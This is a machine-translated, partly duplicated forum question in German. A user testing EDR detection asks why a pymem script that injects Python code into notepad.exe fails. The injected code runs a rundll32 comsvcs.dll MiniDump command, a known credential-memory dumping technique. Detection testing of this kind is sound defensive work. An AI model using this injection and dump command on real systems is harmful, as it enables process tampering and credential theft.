Ich muss eine Prozessinjektion mit Python durchführen. Versuchte das folgende Skript. Mein Ziel ist es, festzustellen, ob das Skript funktioniert, und wenn funktioniert
import pymem
import os
import subprocess
notepad = subprocess.Popen(['notepad.exe'])
pm = pymem.Pymem('notepad.exe')
pm.inject_python_interpreter()
shellcode = """
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full')
"""
pm.inject_python_shellcode(shellcode)
notepad.kill()
< /code>
Der Befehl innerhalb des ShellCode -> os.Systems ('rundll32.exe c: \ windows \ system32 \ comsvcs.dll, Minidump 988 C: \ Dump.dmp full'), wenn Ran wird von unserem EDR -Tool separat blockiert, das angibt, dass es funktioniert. Aber wenn sie im Skript verwendet werden, passiert nichts außer der Öffnung von Notepad. Auch ich sehe keine Benachrichtigung darüber, dass es von EDR blockiert wird. Es scheint, als würde der Code nur ignoriert.f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
Ich muss eine Prozessinjektion mit Python durchführen. Versuchte das folgende Skript. Mein Ziel ist es, festzustellen, ob das Skript funktioniert, und wenn funktioniert[code]import pymem import os import subprocess
notepad.kill() < /code> Der Befehl innerhalb des ShellCode -> os.Systems ('rundll32.exe c: \ windows \ system32 \ comsvcs.dll, Minidump 988 C: \ Dump.dmp full'), wenn Ran wird von unserem EDR -Tool separat blockiert, das angibt, dass es funktioniert. Aber wenn sie im Skript verwendet werden, passiert nichts außer der Öffnung von Notepad. Auch ich sehe keine Benachrichtigung darüber, dass es von EDR blockiert wird. Es scheint, als würde der Code nur ignoriert.f = open("C:\TestRule\process_injection.txt", "w+") f.write("pymem_injection") f.close() [/code] Funktioniert nur gut.>
Ich habe ein Python -Skript mit dem Namen main.py , das im Grunde das Mikrofon des Benutzers verwendet, Befehle erkennt und eine Aufgabe ausführt. Wenn ich Hallo sage, wird das Skript verarbeitet,...
Ich arbeite mit ROS. ROS muss einige Skripte beziehen, z. B. /opt/ros/noetic/setup.sh , bevor Python -Programme ausgeführt werden. Andernfalls kann ich Roslib oder ähnliche Dinge nicht importieren. >
Ich habe zwei Textdateien, Datei 1 ist eine Liste von Namen von Maschen mit einem Pfad. Manchmal ist der Name der gleiche Pfadname und kann Zahlen enthalten. Die Zeilen haben immer staticMesh =...
Ich versuche eine Chrome -Erweiterung zu schreiben, die die Mathjax -Bibliothek verwendet. Ich verwende eine lokale Kopie des Mathjax -Code in meiner Erweiterung, die ich als Inhaltskript in...
Mobile version